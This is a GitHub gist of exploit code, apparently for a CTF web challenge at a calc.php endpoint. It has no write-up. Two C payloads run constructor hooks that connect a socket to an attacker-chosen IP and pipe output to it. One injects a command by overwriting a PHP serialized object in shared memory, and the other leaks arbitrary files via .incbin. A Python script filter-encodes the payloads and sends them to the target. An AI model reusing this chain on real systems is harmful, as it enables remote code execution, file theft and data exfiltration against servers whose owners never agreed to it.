Created
September 2, 2019 00:30
Revisions
-
icchy created this gist
Sep 2, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,70 @@ 123; return 123; } extern void *opendir(const char *); extern void *readdir(void *); extern void *shmat(int, const void *, int); typedef struct { ino_t d_ino; off_t d_off; unsigned short d_reclen; unsigned char d_type; char d_name[256]; } dirent; struct sockaddr { unsigned short int sa_family; char sa_data[14]; }; struct in_addr { uint32_t s_addr; }; struct sockaddr_in { unsigned short int sin_family; unsigned short sin_port; struct in_addr sin_addr; char sin_zero[8]; }; int sock; int data_send(char *data, int len) { return send(sock, data, len, 0); } __attribute__((constructor)) void setup1() { int r; struct sockaddr_in sa; memset(&sa, 0, sizeof(sa)); sa.sin_family = 2; sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */ sa.sin_port = 0x901f; /* and port */ sock = socket(2, 1, 0); connect(sock, (struct sockaddr*)&sa, sizeof(sa)); dup2(sock, 1); } __attribute__((constructor)) void f() { void *dir = (void*)opendir("/tmp"); void *de; while (1) { de = readdir(dir); if (de == NULL) break; char *s = ((dirent*)de)->d_name; if (s[0] == 's' && strlen(s) == 7) { char p[256]; snprintf(p, 255, "/tmp/%s", s); int id = shmget(ftok(p, 'a'), 0, 0); int i = 0; void *data = shmat(id, 0, 0); void *var = data+64; void *size = var-16; char *payload = "__PAYLOAD__"; if (*((uint64_t*)size) != 26) { continue; } *((uint64_t*)size) = strlen(payload); for (i = 0; i < *((uint64_t*)size); i++) { ((char*)var)[i] = payload[i]; } } } } int g(){ int res = 0 This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,49 @@ 123; } __asm__(".section .rodata\n" ".global bin_start\n" ".type bin_start, @object\n" ".balign 16\n" "bin_start:\n" ".incbin \"__PATH__\"\n" ".global bin_end\n" ".type bin_end, @object\n" ".balign 1\n" "bin_end:\n" ".byte 0\n" ); extern const __attribute__((aligned(16))) void *bin_start; extern const void* bin_end; struct sockaddr { unsigned short int sa_family; char sa_data[14]; }; struct in_addr { uint32_t s_addr; }; struct sockaddr_in { unsigned short int sin_family; unsigned short sin_port; struct in_addr sin_addr; char sin_zero[8]; }; int sock; int data_send(char *data, int len) { return send(sock, data, len, 0); } __attribute__((constructor)) void setup1() { int r; struct sockaddr_in sa; memset(&sa, 0, sizeof(sa)); sa.sin_family = 2; sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */ sa.sin_port = 0x901f; /* and port */ sock = socket(2, 1, 0); connect(sock, (struct sockaddr*)&sa, sizeof(sa)); dup2(sock, 1); } __attribute__((constructor)) void f() { printf("%s\n", &bin_start); } int g(){ int res = 0 This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,44 @@ import requests url = 'http://galileo.local:10080/calc.php' url = 'http://192.168.121.171:10080/calc.php' url = 'http://localhost:10080/calc.php' url = 'http://olc.chal.ctf.westerns.tokyo/calc.php' # url = 'http://192.168.121.171/calc.php' def exp(): payload = open('exp.c', 'rb').read() cmd = "/readflag2>/var/tmp/0j29fqj30f" obj = 'a:2:{s:9:"__started";i:1;i:2;O:4:"Calc":3:{s:3:"bin";s:%d:"";%s;";s:3:"src";s:6:"abcdef";s:3:"tmp";R:4;}}' % (3 + len(cmd), cmd) obj = obj.replace('{', '\\x7b').replace('}', '\\x7d').replace('"', '\\"') payload = payload.replace('__PAYLOAD__', obj) payload = payload.replace('{', '<%') payload = payload.replace('}', '%>') payload = payload.replace('#', '%:') payload = payload.replace('\n', ' ') req = requests.get(url, params={ 'formula': payload }) print(req.content) def leak(path): payload = open('leak.c', 'rb').read().replace('__PATH__', path) payload = payload.replace('{', '<%') payload = payload.replace('}', '%>') payload = payload.replace('#', '%:') payload = payload.replace('\n', ' ') req = requests.get(url, params={ 'formula': payload }) print(req.content) leak('./calc.php') exp() leak('/var/tmp/0j29fqj30f')